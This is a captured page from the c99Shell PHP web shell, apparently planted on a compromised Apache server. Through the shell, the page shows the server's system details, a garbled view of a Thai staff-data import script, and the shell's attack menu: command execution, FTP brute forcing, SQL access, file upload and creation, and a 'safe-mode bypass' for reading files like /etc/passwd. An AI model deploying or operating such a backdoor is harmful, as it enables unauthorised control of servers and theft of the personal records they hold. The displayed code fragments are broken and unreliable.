!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ImportPsExcel.php (16.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
RSperson();
if($oPS->GetRecord()=="0"){
	$chk=0;
}else{
	$chk=1;
}

?>


">นำข้อมูลเข้า นำข้อมูลเข้าจาก excel alert("ไฟล์ที่อัพโหลดมีขนาดใหญ่เกินไป !!") '; } else if($c=="2") { echo ''; } ?>
" align="center">
">1. ดาวน์โหลดแฟ้มข้อมูล เพื่อกรอกข้อมูล
">      ดาวน์โหลดแฟ้มตัวอย่าง [คลิกที่นี่]

">      ตัวอย่างการกรอกแฟ้มข้อมูล


"> "> >>>
">ข้อมูลคำนำหน้าชื่อ
">รหัส
คำนำหน้าชื่อ
">คำนำหน้าชื่อ
1นาย
2นางสาว
3นาง

"> "> RSDeptByMaxdeptDate(); while($oDP->GetRecord()){ if(($i%2) == 0) echo ""; else echo ""; ?>
">ข้อมูลหน่วยงาน
">รหัส
หน่วยงาน
">ชื่อหน่วยงาน
deptId; ?> deptName; ?>
">2. อัพโหลดแฟ้มข้อมูล
 
">      แฟ้มข้อมูล
 
alert("ได้รับไฟล์แล้ว ชื่อ '.$n.' ขนาด '.$s.' ไบต์")'; ?>
$loginname); for ($k= 0; $k<$j; $k++) { if($aPerson[$k]["N"]==$loginname){ $aPerson2[$cnt]["C"]=$loginname; $cnt++; } } $j++; } } //----------------------------------------------------------------------------------------------- ?>
ข้อมูลจากแฟ้ม  
" size="2">มีชื่อผู้ใช้(Login) ซ้ำ กรุณากลับไปแก้ไขแฟ้ม และทำการอัพโหลดแฟ้มใหม่

"> "; else echo ""; ?> "; for ($y = 0; $y<$cnt; $y++) { // echo "person=".$aPerson2[$y]["C"]."   login=".$loginname."result==".strcmp($aPerson2[$y]["C"],$loginname)."
"; if(strcmp($aPerson2[$y]["C"],$loginname)=="0"){ $mark++; } } ?>
"># ">รหัส
คำนำหน้า
ชื่อ
">ชื่อ ">นามสกุล ">รหัส
หน่วยงาน
">ชื่อผู้ใช้
(Login)
        " size="2">
" size="2">** ไม่ปรากฏข้อมูลบุคลากรในแฟ้ม **

"> "> >>>
">ข้อมูลคำนำหน้าชื่อ
">รหัส
คำนำหน้าชื่อ
">คำนำหน้าชื่อ
1นาย
2นางสาว
3นาง

"> "> RSDeptByMaxdeptDate(); while($oDP->GetRecord()){ if(($i%2) == 0) echo ""; else echo ""; ?>
">ข้อมูลหน่วยงาน
">รหัส
หน่วยงาน
">ชื่อหน่วยงาน
deptId; ?> deptName; ?>

">บันทึกข้อมูลเรียบร้อยแล้ว

"> RSperson(); while($oPS->GetRecord()){ $oUms->SearchByUsPsCode($oPS->personId); $oUms->GetRecord(); if(($j%2) == 0) echo ""; else echo ""; ?>
"># ">รหัส
คำนำหน้า
ชื่อ
">ชื่อ ">นามสกุล ">รหัส
หน่วยงาน
">ชื่อผู้ใช้
(Login)
 prefixId; ?>  fName; ?>  lName; ?>  deptId; ?>  UsLogin; ?>

bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--